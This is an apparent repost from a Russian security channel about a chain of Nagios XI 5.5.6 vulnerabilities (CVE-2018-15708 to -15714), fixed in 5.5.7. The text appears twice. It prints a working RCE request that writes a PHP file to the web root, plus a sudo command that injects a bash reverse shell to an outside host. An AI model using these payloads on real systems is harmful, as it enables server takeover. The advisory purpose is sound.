Репост из: Information Hardening
#nagios #exploit #обновления
Целая лаба для школьников
В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.
CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
где $URI может быть передан через URI запроса к magpie_debug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:
https://x.x.x.x/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php
CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscover_new.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:
sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'
И еще:
CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.
CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.
CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.
CVE-2018-15713 - хранимая XSS от авторизованного пользователя.
CVE-2018-15714 - отраженная XSS
Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221
Целая лаба для школьников
В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.
CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
где $URI может быть передан через URI запроса к magpie_debug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:
https://x.x.x.x/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php
CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscover_new.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:
sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'
И еще:
CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.
CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.
CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.
CVE-2018-15713 - хранимая XSS от авторизованного пользователя.
CVE-2018-15714 - отраженная XSS
Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221